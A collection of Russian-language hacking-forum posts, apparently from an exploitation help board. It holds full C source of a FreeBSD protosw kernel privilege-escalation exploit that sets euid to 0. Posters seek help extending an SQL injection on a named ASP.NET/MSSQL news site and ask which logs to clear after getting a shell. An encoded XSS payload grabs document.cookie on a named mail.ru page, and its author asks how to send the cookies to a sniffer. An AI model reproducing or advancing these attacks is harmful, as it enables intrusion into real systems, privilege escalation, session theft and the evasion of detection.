1. Их может не быть. Я тоже могу в роботсы прописать хрень вякую 2. Ссылка http://site.ru/administrator отличается во многих случаях от http://site.ru/administrator/ - разницу найди сам 3. Что значит " Почему не заходит в данные каталоги по запросу "? пишет forbidden - каталог есть, но стоит .htaccess соответсвующий, с веба не посмотришь
24free есть много причин,мб прав нет. знаешь так делают: Code: index.php: <?php define('inside', True); library.php: <?php if (! defined('inside')) die('Access denied'); что бы не вызывались файлы напрямую.
_http://www.xakep.ru/post/49508/default.asp В самом начале про протокол DATA.У кого-нибудь это работает? У меня даже такой директивы в php.ini allow_url_include нету.После того,как прописал,тоже ничего не изменилось.
Здравствуйте уважаемые Гуру, у меня возник один сложный для меня, но возможно вполне простой для вас вопрос Гребаные ЧПУ, ненавижу их, но суть не в этом. С -1 все правильно работает, т.е. инъекция есть. если поставить /news/19/08/2009/603+--/ ругается на + страшными словами(если без + то все ровно): Incorrect syntax near '+'. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.Data.SqlClient.SqlException: Incorrect syntax near '+'. Source Error: Line 144: SqlDataAdapter adp = new SqlDataAdapter(q, myConn); Line 145: dt = new DataTable(); Line 146: adp.Fill(dt); Line 147: myConn.Close(); Line 148: break; Version Information: Microsoft .NET Framework Version:2.0.50727.3082; ASP.NET Version:2.0.50727.3082 С MSsql я, скажем так, знаком только отдаленно(кстати не факт что mssql), но мануалы читал, однако что-то в голову никаких мыслей не пришло, единственное что опытным путем удалось установить что этот параметр в запросе самый последний после 603 идет ; Кстати если вместо + в предыдущем запросе поставить пробел ругается абсолютно точно также. Если /news/19/08/2009/603;--/ то ругается Incorrect syntax near 'b'. Нужен ваш совет что делать дальше, какие конструкции попробовать, устроил бы даже посимвольный перебор содержимого БД.
Может не в ту тему я попал, извиняйте меня Кто может скомпилировать ? Code: /* * This is a quick and very dirty exploit for the FreeBSD protosw vulnerability * defined here: * http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc * * This will overwrite your credential structure in the kernel. This will * affect more than just the exploit's process, which is why this doesn't * spawn a shell. When the exploit has finished, your login shell should * have euid=0. * * Enjoy, and happy holidays! * - Don "north" Bailey ([email protected]) 12/25/2008 */ #include <sys/mman.h> #include <sys/time.h> #include <sys/stat.h> #include <sys/proc.h> #include <sys/types.h> #include <sys/param.h> #include <sys/socket.h> #include <netgraph/ng_socket.h> #include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <errno.h> #define PAGES 1 #define PATTERN1 0x8f8f8f8f #define PATTERN2 0x6e6e6e6e typedef unsigned long ulong; typedef unsigned char uchar; int x(void) { struct proc * p = (struct proc * )PATTERN1; uint * i; while(1) { if(p->p_pid == PATTERN2) { i = (uint * )p->p_ucred; *++i = 0; break; } p = p->p_list.le_next; } return 1; } int main(int argc, char * argv[]) { ulong addr; uchar * c; uchar * d; uint * i; void * v; int pid; int s; if(argc != 2) { fprintf(stderr, "usage: ./x <allproc>\n"); return 1; } addr = strtoul(argv[1], 0, 0); v = mmap( NULL, (PAGES*PAGE_SIZE), PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_FIXED, -1, 0); if(v == MAP_FAILED) { perror("mmap"); return 0; } c = v; d = (uchar * )x; while(1) { *c = *d; if(*d == 0xc3) { break; } d++; c++; } *c++ = 0xc3; c = v; while(1) { if(*(long * )c == PATTERN1) { *(c + 0) = addr >> 0; *(c + 1) = addr >> 8; *(c + 2) = addr >> 16; *(c + 3) = addr >> 24; break; } c++; } pid = getpid(); while(1) { if(*(long * )c == PATTERN2) { *(c + 0) = pid >> 0; *(c + 1) = pid >> 8; *(c + 2) = pid >> 16; *(c + 3) = pid >> 24; break; } c++; } s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA); if(s < 0) { perror("socket"); return 1; } shutdown(s, SHUT_RDWR); return 0; } А то у меня не получается
Code: uid=1000(web) gid=1000(web) groups=1000(web У меня достаточно прав для чистки логов? Если да то что за собой нужно чистить?
Привет всем. Опять у меня вопрос. Вопрос про xss. Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad89sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php И мне вдал ссылку: javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47,98,101,114,115,101,114,107,46,109,97,105,108,46,114,117,47,103,97,108,108,101,114,121,47,100,111,99,115,47,115,104,111,119,100,111,99,46,112,104,112,63,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59)); Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47,98,101,114,115,101,114,107,46,109,97,105,108,46,114,117,47,103,97,108,108,101,114,121,47,100,111,99,115,47,115,104,111,119,100,111,99,46,112,104,112,63,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59)) Мне показал мои куки. Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
